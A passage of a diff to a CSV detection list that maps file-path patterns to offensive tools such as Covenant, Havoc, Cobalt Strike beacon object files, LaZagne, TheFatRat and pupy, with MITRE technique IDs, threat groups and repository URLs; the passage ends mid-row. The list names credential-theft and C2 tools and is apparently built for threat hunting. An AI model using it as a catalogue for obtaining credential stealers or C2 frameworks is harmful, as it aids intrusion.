teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/CovenantUsers/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Cracked5pider/*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" -"*/Cracked5pider/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/cracklord.git*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" -"*/cracklord/cmd/*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*/Cracked5pider/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/cracklord.git*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*/cracklord/cmd/*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*/CrackMapExec.git","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/crackmapexec/cme.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/cradle.ps1*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","1","N/A","N/A","N/A","N/A" "*/Crassus.git*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*/Crassus-main*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*/crawler.py -u http*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" -"*/createforestcache.py*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/createforestcache.py*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*/createstager.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/cred_dump.rc*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8267","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/cred_dump.rc*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" "*/Cred_Dump.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*/credBandit/*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" -"*/creddump7*.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*/creddump7/*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*/creddump7/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/Credentials/*.ccache*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/Credentials/firefox_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/Credentials/msol_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/credentials/SudoSnatch*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*/credentials/wifigrabber*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*/CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/CredEnum.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/CredEnum.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/creddump7*.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/creddump7/*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/creddump7/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/Credentials/*.ccache*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/Credentials/firefox_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/Credentials/msol_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/credentials/SudoSnatch*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/credentials/wifigrabber*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredEnum.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredEnum.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/creditcards.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*/CredPhisher/*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/CredPrompt.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/CredPrompt/credprompt.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 